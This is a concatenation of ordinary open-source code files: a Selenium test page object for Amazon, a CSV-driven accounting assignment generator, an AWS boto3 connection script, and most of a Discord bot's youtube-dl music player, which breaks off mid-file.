By\nfrom pages.base_page import Page\n\nclass ProductPage(Page):\n\n ALL_COLOR_OPTIONS = (By.CSS_SELECTOR, '#variation_color_name li')\n COLORS = (By.CSS_SELECTOR, 'span.selection')\n All_PRODUCTS = (By.CSS_SELECTOR, \"[data-component-type='s-search-result']\")\n PRODUCT_IMG = (By.CSS_SELECTOR, \".s-image[data-image-latency='s-product-image']\")\n PRODUCT_TITLE = (By.CSS_SELECTOR, 'h2 span.a-text-normal')\n PRODUCT_TEXT = (By.CSS_SELECTOR, '.a-color-state.a-text-bold')\n PRODUCT_PRICE = (By.CSS_SELECTOR, 'span.a-price-whole')\n ADD_TO_CART = (By.ID, 'add-to-cart-button')\n GO_TO_CART = (By.CSS_SELECTOR, \"a[href='/cart?ref_=sw_gtc']\")\n def open_product_b0bbjrr25(self):\n self.open_url('https://www.amazon.com/gp/product/B07BJKRR25/')\n\n def click_first_product(self):\n self.click(*self.PRODUCT_PRICE)\n\n\n def add_to_cart(self):\n self.click(*self.ADD_TO_CART)\n\n def click_cart(self):\n self.click(*self.GO_TO_CART)\n\n\n def verify_user_can_click_thru_colors(self):\n self.find_elements(*self.ALL_COLOR_OPTIONS)\n expected_colors = ['Black', 'Blue, Over Dye', 'Bright White', 'Dark Blue Vintage']\n all_color_options = self.find_elements(*self.ALL_COLOR_OPTIONS)\n\n actual_colors = []\n for color in all_color_options[:4]:\n color.click()\n current_color = self.find_element(*self.COLORS).text\n actual_colors += [current_color]\n assert expected_colors == actual_colors, f'Expected {expected_colors} but got {actual_colors}'\n\n\n def verify_product_name_image(self):\n self.find_elements(*self.All_PRODUCTS)\n all_products = self.find_elements(*self.All_PRODUCTS)\n\n for product in all_products:\n assert product.find_element(*self.PRODUCT_IMG).is_displayed(), 'Product image is missing'\n\n assert product.find_element(*self.PRODUCT_TITLE).text, 'Product title is missing'\n\n\n def verify_product_displayed(self, expected_results):\n actual_results = self.find_element(*self.PRODUCT_TEXT).text\n assert expected_results == actual_results, f'Expected {expected_results} and got {actual_results}'\n\n\n\n\n\n\n\n\n\n","repo_name":"pjumper/python-selenium-amazon","sub_path":"pages/product_page.py","file_name":"product_page.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26168845796","text":"#TODO\n# - approx. 3s per pdf, that's an hour for 1000 students\n# - currently only casting to int, need floating point?\n# - replace eval with own string parsing\n# - SUM, Random, basic maths\n# - accounts aren't currently storing their account type\n# this may affect how debiting and crediting work\n# - csv reader uses utf-8 encoding: characters like \"é\" raise UnicodeDecodeError\n# - need more error/exception testing\n# - error catching:\n# - key not in dict\n# - precision of output\n# - round/floor?\n# - Categories not currently in use:\n# - Date, inputDate, type, subaccount, acctPeriod, UsedInDocuments\n# - confirm that empty lines (with no variable can be skipped)\n\n\nimport read_in\nimport write_content\n\nimport sys\nimport re\n\nfrom collections import OrderedDict\nfrom random import randrange, seed\n\n# takes in a string describing the value of a variable\n# handles constants (cast to int), references (lookup vars in dict),\n# random (rand), and mathematical expressions\ndef parseVal(val, vars_dict):\n\n # regex to recognise a variable, defined as an alphanumeric string\n # preceded by a '$'\n aVar = re.compile(\"\\$([A-Za-z0-9]+)\")\n\n # replace $ with calls to vars_dict\n if '$' in val:\n # r'\\$(\\w+)' <-- old pattern match\n val = re.sub(aVar, r'vars_dict[\"\\1\"]', val)\n\n if \"SUM\" in val:\n print(\"Warning: SUM not yet implemented, returning 1\")\n return 1\n\n val = val.replace(\"Random\", \"randrange\")\n\n # TODO remove usage of eval\n try:\n val = eval(val)\n except (KeyError) as e:\n print(\"\\tERROR: No such key: \", end=\"\")\n print(e, end=\", evaluating term to one\\n\")\n print(\"\\tCheck that you have spelled the term correctly\")\n val = 1\n except (ZeroDivisionError):\n print(\"Trying to Divide by Zero in term {}, returning 1\".format(val))\n val = 1\n\n return val\n\ndef calculate_assignment(vars_dict, accounts_dict):\n unique_vars_dict = OrderedDict()\n unique_accounts_dict = OrderedDict()\n\n for account in accounts_dict:\n (accountType, openingBalance) = accounts_dict[account]\n unique_accounts_dict[account] = int(openingBalance)\n\n for var in vars_dict:\n (val, transType, account) = vars_dict[var]\n\n val = parseVal(val, unique_vars_dict)\n\n if var not in unique_vars_dict:\n unique_vars_dict[var] = val\n\n if account:\n if account not in accounts_dict:\n print(\"ERRORRRRRR\")\n\n if transType == \"CR\":\n # print(\"{} credited {}\".format(account, val))\n unique_accounts_dict[account] += val\n if transType == \"DR\":\n # print(\"{} debited {}\".format(account, val))\n unique_accounts_dict[account] -= val\n\n return (unique_vars_dict, unique_accounts_dict)\n\n# read in an accounts list and a var list for a single student, then print values\n# out to said students folder. Random values in the lists a seeded by the\n# students number and a version number for regeneration\n# TODO this reads in the same vars_list and accounts_list once per student.\n# With a fair bit of refactoring we could potentially mitigate this.\n# However, I can see interdependence of rng state across students causing\n# issues\ndef read_csv(student_path, accounts_path, vars_path):\n\n # read in vars_dict, don't evaluate values\n vars_dict = read_in.readInVars(vars_path)\n\n # read in accounts_dict, initial states\n accounts_dict = read_in.readInAccounts(accounts_path)\n\n students = read_in.readInStudents(student_path)\n\n # use vars_dict and accounts_dict to generate unique per student versions\n\n for student in students:\n (SID, version) = student\n try:\n seed(SID + version)\n (unique_vars_dict, unique_accounts_dict) = calculate_assignment(vars_dict, accounts_dict)\n write_content.printDicts(SID, unique_accounts_dict, unique_vars_dict)\n except UnicodeDecodeError as e:\n print(\"Unicode decoding error:\\n\\tplease check input for non utf8\"\n \" characters (é, ü, â)\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Invalid number of args: input should be\\n\\t\"\n \"student_list, accounts_path, vars_path\")\n else:\n [student_list, accounts_path, vars_path] = sys.argv[1:]\n read_csv(student_list, accounts_path, vars_path)\n","repo_name":"ajmorton/doc_gen","sub_path":"gen_docs.py","file_name":"gen_docs.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71303002066","text":"import boto3 # pip install boto3\nfrom dotenv import load_dotenv\nimport dynamo_s3\nimport ia\nimport os\nimport base64\n\nload_dotenv()\n\nACCESS_KEY_ID = os.getenv('ACCESS_KEY_ID')\nSECRET_ACCESS_KEY = os.getenv('SECRET_ACCESS_KEY')\nREGION_NAME = os.getenv('REGION_NAME')\n\n\ndef connect_AWS_Services() -> bool:\n try:\n # CONECTAR A LA BASE DE DATOS\n dynamo_s3.client_dynamodb = boto3.client('dynamodb',\n aws_access_key_id=ACCESS_KEY_ID,\n aws_secret_access_key=SECRET_ACCESS_KEY,\n region_name=REGION_NAME)\n # CONECTAR A BUCKET S3 DE IMAGENES\n dynamo_s3.client_s3 = boto3.client('s3',\n aws_access_key_id=ACCESS_KEY_ID,\n aws_secret_access_key=SECRET_ACCESS_KEY,\n region_name=REGION_NAME)\n # CONECTAR A REKOGNITION\n ia.client_rekognition = boto3.client('rekognition',\n aws_access_key_id=ACCESS_KEY_ID,\n aws_secret_access_key=SECRET_ACCESS_KEY,\n region_name=REGION_NAME)\n\n # CONECTAR A TRANSLATE\n ia.client_translate = boto3.client('translate',\n aws_access_key_id=ACCESS_KEY_ID,\n aws_secret_access_key=SECRET_ACCESS_KEY,\n region_name=REGION_NAME)\n except:\n print(\"Something went wrong connecting with AWS Services\")\n return False\n else:\n print(\"AWS Services running!\")\n return True\n\n\ndef getBase64(path: str) -> str:\n text_file = open(path, \"r\")\n data = text_file.read()\n text_file.close()\n return data\n\n\nif __name__ == '__main__':\n if connect_AWS_Services():\n # dynamo_s3.add_user(\"luisd\", \"0000\", \"Luis Danniel Castellanos\",\n # getBase64('../testing/perfil1.txt'), \"img1.jpg\")\n # dynamo_s3.updateUser(\"luisd\", \"0000\", \"ldecast\", \"Luis Danniel Ernesto Castellanos Galindo\")\n # dynamo_s3.uploadPhoto('luisd', getBase64(\n # '../testing/sistemas.txt'), 'Sistemas.jpg', 'Pensum de sistemas')\n # dynamo_s3.updateProfilePhoto(\"luisd\", getBase64('../testing/perfil2.txt'), 'img2.jpg')\n # dynamo_s3.add_user(\"luisd\", \"1234\", \"LuisDa\", getBase64('../testing/perfil1.txt'), \"hola.jpg\")\n dynamo_s3.deletePhoto('ldecast','Fotos_Perfil/ldecast/img1.jpg')\n # dynamo_s3.get_user('ldecast')\n\n # b64_decode = base64.b64decode(getBase64('../testing/texto3.txt'))\n # ia.getPhotoLabels(b64_decode)\n # ia.extractText(b64_decode)\n # ia.translateText('Hola mundo', 'fr')\n pass\n","repo_name":"ldecast/PORTAL-DE-FOTOS","sub_path":"storage-IA/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39076867206","text":"from typing import Union\nfrom datetime import timedelta\nfrom discord.ext import tasks\nfrom marcel.util import embed_message\nimport asyncio\nimport discord\nimport time\nimport youtube_dl\nimport logging\nimport random\n\n\"\"\"\n Marcel the Discord Bot\n Copyright (C) 2019-2020 akrocynova\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\"\"\"\n\nclass PlayerInfo:\n def __init__(\n self,\n title: str = None,\n author: str = None,\n thumbnail: str = None,\n duration: int = 0,\n url: str = None,\n playback_url: str = None,\n found: bool = False,\n from_ytdl: bool = False,\n error: str = None) -> None:\n \"\"\"Media player information\"\"\"\n self.title = title\n self.author = author\n self.thumbnail = thumbnail\n\n if isinstance(duration, int):\n self.duration = duration\n else:\n try:\n self.duration = int(duration)\n\n except:\n self.duration = 0\n\n self.url = url\n self.playback_url = playback_url\n self.found = found\n self.error = error\n if self.error is None:\n self.short_error = None\n elif len(self.error) >= 256:\n self.short_error = \"{}...\".format(self.error[:253])\n else:\n self.short_error = error\n\n # This indicates the Media Player that the PlayerInfo was extracted from youtube-dl\n # The Media Player will fetch the regular URL using youtube-dl right before playing it\n # to fix an issue where the extracted playback URLs expire after some time\n self.from_ytdl = from_ytdl\n\n def clear(self) -> None:\n self.title = None\n self.author = None\n self.thumbnail = None\n self.duration = 0\n self.url = None\n self.playback_url = None\n self.found = False\n\n def is_http(self) -> bool:\n if self.playback_url:\n if self.playback_url.startswith(\"http://\") or self.playback_url.startswith(\"https://\"):\n return True\n\n return False\n\n def copy(self):\n return PlayerInfo(\n title=self.title,\n author=self.author,\n thumbnail=self.thumbnail,\n duration=self.duration,\n url=self.url,\n playback_url=self.playback_url,\n found=self.found,\n from_ytdl=self.from_ytdl\n )\n\n def get_embed(self, title: str, color: discord.Color, show_duration: bool = True) -> discord.Embed:\n \"\"\"Create a discord.Embed to display PlayerInfo information\"\"\"\n\n embed = discord.Embed(\n title=self.title if self.title else \"[untitled]\",\n description=\"by {}\".format(self.author if self.author else \"[unknown]\"),\n url=self.url if self.url else \"\",\n color=color\n )\n\n embed.set_author(name=title)\n if self.thumbnail:\n embed.set_thumbnail(url=self.thumbnail)\n\n if show_duration and self.duration > 0:\n embed.set_footer(text=str(timedelta(seconds=self.duration)).split(\".\")[0].strip())\n\n return embed\n\nclass MarcelMediaPlayer:\n def __init__(\n self,\n guild: discord.Guild,\n volume: float = 1.0,\n volume_limit: float = 1.25,\n player_queue_limit: int = 20,\n duration_limit: int = 1800,\n idle_limit: int = 0) -> None:\n \"\"\"Marcel media player\n guild: discord.Guild() to which the media player belongs to\n volume: volume value (1.0 represents 100%)\n volume_limit: maximum volume value (1.0 represents 125%)\n player_queue_limit: maximum size of the player queue\n duration_limit: maximum requested media duration (in seconds)\n idle_limit: time (in seconds) of inactivity after which the bot will\n automatically disconnect from the voice channel\n (0 to disable)\n \"\"\"\n self.guild = guild\n self.player_volume = volume\n self.player_volume_limit = volume_limit\n self.player_queue_limit = player_queue_limit\n self.duration_limit = duration_limit\n self.idle_limit = idle_limit\n\n self.voice_client = None\n self.autoplay = False\n self.previous_channel = None\n self.player_busy = False\n self.player_info = PlayerInfo()\n self.last_played = None\n self.player_queue = list()\n\n self.loop = asyncio.get_event_loop()\n self.connect_timeout = 10.0\n self.last_active = time.time()\n self.last_not_alone = time.time()\n\n self.on_voice_join = None\n self.on_voice_leave = None\n self.on_media_play = None\n\n @tasks.loop(seconds=30)\n async def inactivity_loop(self) -> None:\n if self.is_in_voice_channel():\n if self.is_media_playing():\n self.last_active = time.time()\n\n elif self.idle_limit > 0 and time.time() - self.last_active >= self.idle_limit:\n await self.leave_voice_channel(reason=\"inactive for a while\")\n return\n\n for member in self.voice_client.channel.members:\n if member == self.guild.me:\n continue\n if not member.voice.afk:\n self.last_not_alone = time.time()\n return\n\n if time.time() - self.last_not_alone >= 60:\n await self.leave_voice_channel(reason=\"bot is alone\")\n\n else:\n self.inactivity_loop.stop()\n\n @inactivity_loop.after_loop\n async def inactivity_loop_after(self) -> None:\n if self.is_in_voice_channel():\n logging.critical(\"Inactivity loop stopped but voice is still connected (guild: {})\".format(self.guild.id))\n await self.leave_voice_channel(reason=\"unexpected error\")\n\n def after_callback(self, error: Exception = None) -> None:\n \"\"\"Callback after a media has finished playing\"\"\"\n\n logging.info(\"after_callback for guild: {}\".format(self.guild.id))\n if error:\n logging.error(\"after_callback error for guild: {}: {}\".format(self.guild.id, error))\n\n if self.autoplay:\n if self.player_busy:\n self.loop.create_task(self.skip(autoplay=True, delay=5.0))\n else:\n self.loop.create_task(self.skip(autoplay=True))\n\n def set_previous_channel(self, channel: discord.TextChannel) -> None:\n \"\"\"Set previous_channel if needed\"\"\"\n\n if channel:\n self.previous_channel = channel\n\n def is_in_voice_channel(self) -> bool:\n \"\"\"Return True if voice client is connected to a voice channel\"\"\"\n\n return self.voice_client.is_connected() if isinstance(self.voice_client, discord.VoiceClient) else False\n\n def is_media_playing(self) -> bool:\n \"\"\"Return True if media is currently playing\"\"\"\n\n return self.voice_client.is_playing() if self.is_in_voice_channel() else False\n\n def is_media_paused(self) -> bool:\n \"\"\"Return True if media is currently paused\"\"\"\n\n return self.voice_client.is_paused() if self.is_in_voice_channel() else False\n\n def ytdl_entry_to_playerinfo(self, entry: dict) -> PlayerInfo:\n \"\"\"Parse Youtube-DL entry into PlayerInfo\"\"\"\n\n return PlayerInfo(\n title=entry.get(\"title\"),\n author=entry.get(\"uploader\"),\n thumbnail=entry.get(\"thumbnail\"),\n duration=entry.get(\"duration\"),\n url=entry.get(\"webpage_url\"),\n playback_url=entry.get(\"url\"),\n found=True if entry.get(\"url\") else False,\n from_ytdl=True\n )\n\n async def ytdl_fetch(\n self,\n request: str,\n as_playerinfo: bool = False,\n with_playlists: bool = False,\n playlistend: int = 0) -> Union[PlayerInfo, list, dict]:\n \"\"\"Fetch information about a given request using youtube-dl\n request: can either be a link or a text search\n Returns either a list or a PlayerInfo if as_playerinfo is True\"\"\"\n\n try:\n ytdl_opts = {\n \"format\": \"bestaudio/best\",\n \"outtmpl\": \"%(extractor)s-%(id)s-%(title)s.%(ext)s\",\n \"simulate\": True,\n \"skip_download\": True,\n \"playlistend\": self.player_queue_limit if playlistend <= 0 else playlistend,\n \"flat_playlist\": True,\n \"restrictfilenames\": True,\n \"nocheckcertificate\": True,\n \"ignoreerrors\": False,\n \"logtostderr\": False,\n \"quiet\": True,\n \"no_warnings\": True,\n \"default_search\": \"auto\",\n \"source_address\": \"0.0.0.0\",\n \"no_color\": True\n }\n\n if not with_playlists:\n ytdl_opts[\"noplaylist\"] = True\n\n error = \"No results for\"\n\n with youtube_dl.YoutubeDL(params=ytdl_opts) as ytdl:\n await self.loop.run_in_executor(None, ytdl.cache.remove)\n\n try:\n info = await asyncio.wait_for(\n self.loop.run_in_executor(\n None,\n lambda: ytdl.extract_info(\n url=request,\n download=False\n )),\n timeout=300.0\n )\n\n except asyncio.TimeoutError:\n logging.error(\"ytdl_fetch timed out for guild: {}: {}\".format(\n self.guild.id,\n request\n ))\n\n info = dict(entries=list())\n error = \"Request took too long (timed out)\"\n\n except Exception as e:\n logging.error(\"ytdl_fetch: {}\".format(e))\n\n info = dict(entries=list())\n error = str(e)[6:].strip()\n\n if as_playerinfo:\n entries = info.get(\"entries\", [info])\n\n if len(entries) == 0:\n return PlayerInfo(error=error)\n elif with_playlists:\n return [self.ytdl_entry_to_playerinfo(x) for x in entries]\n else:\n return self.ytdl_entry_to_playerinfo(entries[0])\n\n else:\n return info\n\n except Exception as e:\n logging.error(\"ytdl_fetch: {}\".format(e))\n return PlayerInfo(error=str(e)[6:].strip()) if as_playerinfo else dict()\n\n async def send_nothing_playing(self) -> None:\n \"\"\"Send a nothing is playing message to the previous channel\"\"\"\n\n await self.previous_channel.send(\n embed=embed_message(\n \"Nothing is playing\",\n discord.Color.blue()\n )\n )\n\n async def change_voice_state(self, self_mute: bool = False, self_deaf: bool = False) -> None:\n if self.is_in_voice_channel():\n await self.guild.change_voice_state(\n channel=self.voice_client.channel,\n self_mute=self_mute,\n self_deaf=self_deaf\n )\n\n async def _move_to(self, voice_channel: discord.VoiceChannel) -> None:\n await self.voice_client.move_to(voice_channel)\n\n while not self.voice_client.channel == voice_channel:\n await asyncio.sleep(0.1)\n\n async def join_voice_channel(self, voice_channel: discord.VoiceChannel) -> None:\n \"\"\"Join or move to a voice channel\"\"\"\n\n if not voice_channel.permissions_for(self.guild.me).connect:\n await self.previous_channel.send(\n embed=embed_message(\n \"I do not have permission to join voice channel\",\n discord.Color.dark_red(),\n message=voice_channel.name\n )\n )\n return\n\n if self.is_in_voice_channel():\n if self.voice_client.channel == voice_channel:\n await self.previous_channel.send(\n embed=embed_message(\n \"I'm sorry Dave, I'm afraid I cannot duplicate myself\",\n discord.Color.dark_red()\n )\n )\n return\n\n try:\n await asyncio.wait_for(self._move_to(voice_channel), self.connect_timeout)\n self.last_active = time.time()\n\n if self.on_voice_join is not None:\n self.loop.create_task(self.on_voice_join(voice_channel, self))\n\n await self.previous_channel.send(\n embed=embed_message(\n \"I moved over to\",\n discord.Color.green(),\n voice_channel.name\n )\n )\n\n except Exception as e:\n logging.error(\"Unable to move to voice channel for guild: {}: {}\".format(\n self.guild.id,\n e\n ))\n await self.previous_channel.send(\n embed=embed_message(\n \"I cannot move to voice channel\",\n discord.Color.dark_red(),\n message=voice_channel.name\n )\n )\n\n else:\n try:\n self.voice_client = await voice_channel.connect(\n timeout=self.connect_timeout,\n reconnect=False\n )\n\n self.last_active = time.time()\n self.last_not_alone = time.time()\n try:\n self.inactivity_loop.start()\n\n except Exception as e:\n logging.error(\"Cannot start inactivity loop for guild: {}: {}\".format(\n self.guild.id,\n e\n ))\n\n if self.on_voice_join is not None:\n self.loop.create_task(self.on_voice_join(voice_channel, self))\n\n await self.previous_channel.send(\n embed=embed_message(\n \"Joined voice channel\",\n discord.Color.green(),\n message=self.voice_client.channel.name\n )\n )\n\n except Exception as e:\n logging.error(\"Unable to join voice channel for guild: {}: {}\".format(\n self.guild.id,\n e\n ))\n await self.previous_channel.send(\n embed=embed_message(\n \"I cannot join voice channel\",\n discord.Color.dark_red(),\n message=voice_channel.name\n )\n )\n\n async def join_member_voice_channel(self, member: discord.Member, channel: discord.TextChannel = None) -> None:\n \"\"\"Join or move to the voice channel the member is in\"\"\"\n\n self.set_previous_channel(channel)\n\n try:\n if member.voice:\n await self.join_voice_channel(member.voice.channel)\n\n else:\n await self.previous_channel.send(\n embed=embed_message(\n \"You must join a voice channel first\",\n discord.Color.dark_red()\n )\n )\n\n except Exception as e:\n logging.error(\"join_voice_channel: {}\".format(e))\n await self.previous_channel.send(\"Unexpected error:\\n```{}```\".format(e))\n\n async def leave_voice_channel(\n self,\n channel: discord.TextChannel = None,\n silent: bool = False,\n reason: str = None) -> None:\n \"\"\"Leave the connected voice channel\"\"\"\n\n self.set_previous_channel(channel)\n\n try:\n if self.is_in_voice_channel():\n if self.is_media_playing() or self.is_media_paused():\n self.autoplay = False\n self.voice_client.stop()\n\n self.player_info.clear()\n self.last_played = None\n voice_channel = self.voice_client.channel\n await self.voice_client.disconnect()\n\n if self.on_voice_leave is not None:\n self.loop.create_task(self.on_voice_leave(voice_channel, self))\n\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Left voice channel{}\".format(\n \" ({})\".format(reason) if reason else \"\"\n ),\n discord.Color.red(),\n voice_channel.name\n )\n )\n\n elif not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"I'm sorry Dave, I'm afraid I wasn't connected to a voice channel\",\n discord.Color.red()\n )\n )\n\n self.player_busy = False\n\n except Exception as e:\n logging.error(\"leave_voice_channel: {}\".format(e))\n await self.previous_channel.send(\"Unexpected error:\\n```{}```\".format(e))\n\n async def play(\n self,\n request: Union[str, PlayerInfo],\n channel: discord.TextChannel = None,\n member: discord.Member = None,\n silent: bool = False,\n autoplay: bool = False,\n respect_duration_limit: bool = True,\n shuffle: bool = False) -> None:\n \"\"\"Play a media\n If request is not a PlayerInfo, it youtube-dl to fetch information\n silent: If True no messages will be sent to the previous text channel\n autoplay: whether autoplay should be enabled\n respect_duration_limit: If False, ignore the media duration limit\n shuffle: If True, shuffle playlists before adding them to the queue\"\"\"\n\n self.set_previous_channel(channel)\n\n fetch_before_play = True\n pinfos = None\n if isinstance(request, PlayerInfo):\n fetch_before_play = request.from_ytdl\n pinfo = request\n\n elif len(request) == 0:\n await self.previous_channel.send(\n embed=embed_message(\n \"You can't play emptiness\",\n discord.Color.dark_red()\n )\n )\n return\n\n else:\n async with self.previous_channel.typing():\n pinfos = await self.ytdl_fetch(\n request,\n as_playerinfo=True,\n with_playlists=True\n )\n\n if isinstance(pinfos, PlayerInfo):\n if not pinfos.found:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n pinfos.short_error,\n discord.Color.dark_red(),\n message=request\n )\n )\n return\n\n pinfos = [pinfos] if pinfos.found else list()\n\n if shuffle:\n random.shuffle(pinfos)\n\n pinfo = pinfos[0]\n\n if len(pinfos) > 1:\n await self.player_queue_add(\n pinfos[1:],\n channel=None,\n silent=silent,\n shuffle=False\n )\n\n else:\n # If there is only one result, don't refresh the playback URLs\n # We don't disable the refresh if there are multiple results\n # because grabbing multiple results can take some time and the\n # playback URL can expire\n fetch_before_play = False\n\n if not self.is_in_voice_channel() and member:\n await self.join_member_voice_channel(member, self.previous_channel)\n\n if not self.is_in_voice_channel():\n await self.previous_channel.send(\n embed=embed_message(\n \"Cannot play media\",\n discord.Color.dark_red(),\n message=\"Not connected to a voice channel\"\n )\n )\n return\n\n if respect_duration_limit and pinfo.duration > self.duration_limit:\n await self.previous_channel.send(\n embed=pinfo.get_embed(\n \"Cannot play medias that last more than {} minutes\".format(int(self.duration_limit / 60)),\n discord.Color.gold()\n )\n )\n\n # Trigger callback as if media had been played to skip to the next\n self.autoplay = autoplay\n self.after_callback(None)\n return\n\n if self.player_busy:\n if not silent:\n await self.previous_channel.send(\n embed=pinfo.get_embed(\n \"The play requests are flowing too fast! Skipping this one\",\n discord.Color.gold()\n )\n )\n return\n\n self.player_busy = True # lock player\n self.last_active = time.time()\n try:\n if self.is_media_playing() or self.is_media_paused():\n # Always disable autoplay before stopping to prevent the callback to play something else\n self.autoplay = False\n self.voice_client.stop()\n\n if fetch_before_play:\n async with self.previous_channel.typing():\n # Always refresh the playback URL when fetched from youtube-dl to prevent expired URLs\n pinfo = await self.ytdl_fetch(\n pinfo.url,\n as_playerinfo=True\n )\n\n if not pinfo.found:\n raise Exception(pinfo.error)\n\n self.player_info = pinfo.copy()\n self.last_played = self.player_info.copy()\n\n if self.on_media_play is not None:\n self.loop.create_task(self.on_media_play(self.player_info.copy(), self))\n\n player = discord.PCMVolumeTransformer(\n discord.FFmpegPCMAudio(\n pinfo.playback_url,\n options=\"-vn\",\n before_options=\"-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5\" if pinfo.is_http() else \"\"\n ),\n volume=self.player_volume\n )\n\n self.voice_client.play(\n player,\n after=self.after_callback\n )\n\n if not silent:\n await self.previous_channel.send(\n embed=pinfo.get_embed(\n \"Now playing\",\n discord.Color.red()\n )\n )\n\n self.autoplay = autoplay\n\n except Exception as e:\n logging.error(\"play: {}\".format(e))\n await self.previous_channel.send(\"Unexpected error:\\n```{}```\".format(e))\n\n self.player_busy = False # unlock player\n\n async def skip(\n self,\n channel: discord.TextChannel = None,\n silent: bool = False,\n autoplay: bool = False,\n respect_duration_limit: bool = True,\n delay: float = None) -> None:\n \"\"\"Skip current media and play the next in queue\"\"\"\n\n if delay:\n logging.warning(\"Skip delayed by {} seconds for guild: {}\".format(\n delay,\n self.guild.id\n ))\n await asyncio.sleep(delay)\n\n self.set_previous_channel(channel)\n\n if len(self.player_queue) == 0:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"There is nothing left to play\",\n discord.Color.blue()\n )\n )\n\n if not self.is_media_playing() and not self.is_media_paused():\n self.player_info.clear()\n\n else:\n await self.play(\n self.player_queue[0],\n channel=channel,\n member=None,\n silent=silent,\n autoplay=autoplay,\n respect_duration_limit=respect_duration_limit\n )\n del self.player_queue[0]\n\n async def stop(self, channel: discord.TextChannel = None, silent: bool = False) -> None:\n \"\"\"Stop any currently playing media and disable autoplay\"\"\"\n\n self.set_previous_channel(channel)\n\n self.autoplay = False\n if self.is_media_playing() or self.is_media_paused():\n self.voice_client.stop()\n\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Stopped playing\",\n discord.Color.dark_red()\n )\n )\n\n self.player_info.clear()\n\n else:\n if not silent:\n await self.send_nothing_playing()\n\n async def pause(self, channel: discord.TextChannel = None, silent: bool = False) -> None:\n \"\"\"Pause a playing media\"\"\"\n\n self.set_previous_channel(channel)\n\n if self.is_media_playing():\n self.voice_client.pause()\n\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Paused\",\n discord.Color.dark_blue()\n )\n )\n\n elif self.is_media_paused():\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Already paused\",\n discord.Color.dark_blue()\n )\n )\n\n else:\n if not silent:\n await self.send_nothing_playing()\n\n async def resume(self, channel: discord.TextChannel = None, silent: bool = False) -> None:\n \"\"\"Resume a paused media\"\"\"\n\n self.set_previous_channel(channel)\n\n if self.is_media_paused():\n self.voice_client.resume()\n\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Resumed\",\n discord.Color.red()\n )\n )\n\n elif self.is_media_playing():\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Already playing\",\n discord.Color.dark_red()\n )\n )\n\n else:\n if not silent:\n await self.send_nothing_playing()\n\n async def player_queue_add(\n self,\n request: Union[str, list, PlayerInfo],\n channel: discord.TextChannel = None,\n silent: bool = False,\n shuffle: bool = False) -> None:\n \"\"\"Add PlayerInfo or PlayerInfo list or request results (including playlists) to the player queue\"\"\"\n\n self.set_previous_channel(channel)\n\n if isinstance(request, PlayerInfo):\n pinfos = [request]\n\n else:\n if len(request) == 0:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"I cannot add nothing to the player queue\",\n discord.Color.dark_red()\n )\n )\n return\n\n if isinstance(request, list):\n pinfos = request\n\n else:\n async with self.previous_channel.typing():\n pinfos = await self.ytdl_fetch(\n request,\n as_playerinfo=True,\n with_playlists=True\n )\n\n if isinstance(pinfos, PlayerInfo):\n if not pinfos.found:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n pinfos.short_error,\n discord.Color.dark_red(),\n request\n )\n )\n return\n\n pinfos = [pinfos] if pinfos.found else list()\n\n if shuffle:\n random.shuffle(pinfos)\n\n if len(self.player_queue) >= self.player_queue_limit:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Cannot add more than {} songs to the player queue\".format(\n self.player_queue_limit\n ),\n discord.Color.gold()\n )\n )\n return\n\n added = 0\n playlist_embed = discord.Embed(color=discord.Color.green())\n for pinfo in pinfos:\n self.player_queue.append(pinfo)\n\n if added == 0:\n playlist_embed.title = pinfo.title\n playlist_embed.description = pinfo.author\n playlist_embed.url = pinfo.url\n if pinfo.thumbnail:\n playlist_embed.set_thumbnail(url=pinfo.thumbnail)\n\n elif added <= 19:\n playlist_embed.add_field(\n name=pinfo.title,\n value=pinfo.author,\n inline=False\n )\n\n added += 1\n\n if len(self.player_queue) >= self.player_queue_limit:\n if not silent and len(pinfos) > added:\n await self.previous_channel.send(\n embed=embed_message(\n \"Discarded {} songs because the player queue is full\".format(\n len(pinfos) - added\n ),\n discord.Color.dark_red()\n )\n )\n break\n\n if added > 19:\n remaining = added - 19\n playlist_embed.add_field(\n name=\"...\",\n value=\"+ {} song{}\".format(\n remaining,\n \"s\" if remaining != 1 else \"\"\n ),\n inline=False\n )\n\n if added == 1:\n playlist_embed.set_author(name=\"Song added to the player queue\")\n\n else:\n playlist_embed.set_author(name=\"Added {} songs to the player queue\".format(\n added\n ))\n\n if not silent:\n await self.previous_channel.send(embed=playlist_embed)\n\n async def player_queue_clear(self, channel: discord.TextChannel, silent: bool = False) -> None:\n \"\"\"Clear player queue\"\"\"\n\n self.set_previous_channel(channel)\n\n self.player_queue.clear()\n\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Player queue was cleared\",\n discord.Color.dark_blue()\n )\n )\n\n async def player_queue_shuffle(self, channel: discord.TextChannel, silent: bool = False) -> None:\n \"\"\"Shuffle player queue\"\"\"\n\n 